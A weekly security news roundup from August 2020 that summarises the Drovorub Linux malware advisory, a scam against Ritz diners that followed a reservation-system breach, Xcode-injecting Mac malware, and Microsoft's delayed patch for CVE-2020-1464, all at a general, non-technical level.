This Week In Security - 08/24/2020
Linux Malware Could Jeopardize US National Security
The Federal Bureau of Investigation (FBI) and the National Security Agency (NSA) released a joint report last week warning that Russian state hackers are “deploying previously undisclosed malware for Linux® systems, called Drovorub” to “infiltrate sensitive networks, steal confidential information, and execute malicious commands”.
Steve Grobman, the CTO of the computer security software company, McAfee, described Drovorub as “a ‘swiss-army-knife’ of capabilities that allows the attacker to perform many different functions, such as stealing files and remote controlling the victim’s computer”.
The report alleges that “the malware has been used in unspecified cyber-espionage operations that it has tied to the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS)”.
The Drovorub malware is also believed to be linked to “the Russian threat group Fancy Bear (also known as APT28, Strontium, and Sofacy)”.
The advisory is considered required reading for all US organizations and businesses running a Linux system. According to Grobman, the “objectives of Drovorub… could range from industrial espionage to election interference”.
He went on to say, “Technical details released today by the NSA and FBI on APT28’s Drovorub toolset are highly valuable to cyber defenders across the United States” which, he added, is “a target-rich environment for potential cyber-attacks”.
Ritz Diners Scammed After Probable Data Breach
Diners at the prodigious Ritz Hotel have been scammed for payment card details following “a ‘potential data breach’ within the hotel’s food and beverage reservation system”.
Posing as hotel staff, the scammers contacted people with bookings at the hotel, giving them precise details of their reservations before asking them to divulge their payment card details over the phone.
In what has been described as “a very sophisticated scam”, the fraudsters also managed to spoof the Ritz’s phone number, making it appear as though the calls were coming from the hotel itself.
The Ritz has since confirmed that “on 12th August 2020, we were aware of a potential data breach within our food and beverage reservation system, which may have compromised some of our clients’ personal data”.
The hotel chain also said, “We immediately launched an investigation to identify the cause of the breach, which is ongoing, to find out what happened, how and to prevent this from happening again”.
Unfortunately, the Ritz’s response wasn’t fast enough as “the attackers lost no time capitalizing on the stolen customer data”.
Furthermore, as Jessica Barker, of the cybersecurity company Cygenta, points out, “when a scam like this involves insider information it adds an air of legitimacy and authority”.
Mac Malware Corrupts Apps at Source
Seemingly “benign open-source projects” are being infected with malware “that contains two previously unseen zero-day exploits”.
According to a white paper published by Trend Micro, “the source malware… leads to a rabbit hole of malicious payloads”. The malware targets the users’ web browser app and, with Safari for instance, “downloads and installs a malicious version of Safari and makes sure any internal links to the real Safari go to the fake one instead”.
Although the malware itself is dangerous, what’s even more worrying is “the novel way it sneaks onto a user’s device”. The “malicious code is injected into local Xcode projects so that when the project is built, the malicious code is run”.
Software developers may be unaware of the presence of the malicious code and “release the applications with their own authorized signatures”, therefore “the infected apps will not always be stopped by Apple’s own built-in security safeguards”.
To prevent this “devilishly clever” malware from infecting your Mac, you should only download apps from official app stores and make sure you have anti-virus software both installed and updated.
Microsoft Finally Patches Two-Year-Old Vulnerability
On August 11’s Patch Tuesday, Microsoft finally plugged a security flaw in Microsoft Windows – after it had been “actively exploited in malware attacks for two years”.
The security hole, known as CVE-2020-1464, was patched earlier this month, resolving an ongoing “problem with the way every supported version of Windows validates digital signatures”.
Microsoft said the “spoofing vulnerability” could be used “to bypass security features intended to prevent improperly signed files from being loaded”.
It is unknown whether security researchers within the company had been informed of the flaw which “was first spotted in attacks used in the wild back in August 2018”.
Bernado Quintero, of the malware detection company, VirusTotal, said he had alerted Microsoft to the vulnerability in January 2019 and that, while “Microsoft’s security team validated his findings, the company chose not to address the problem at the time”.
According to cybersecurity researcher, Tal Be’ery, when a file known as GlueBall abused the vulnerability back in 2018, “It was very clear to everyone involved, Microsoft included, that GlueBall is indeed a valid vulnerability exploited in the wild. Therefore, it is not clear why it was only patched now and not two years ago”.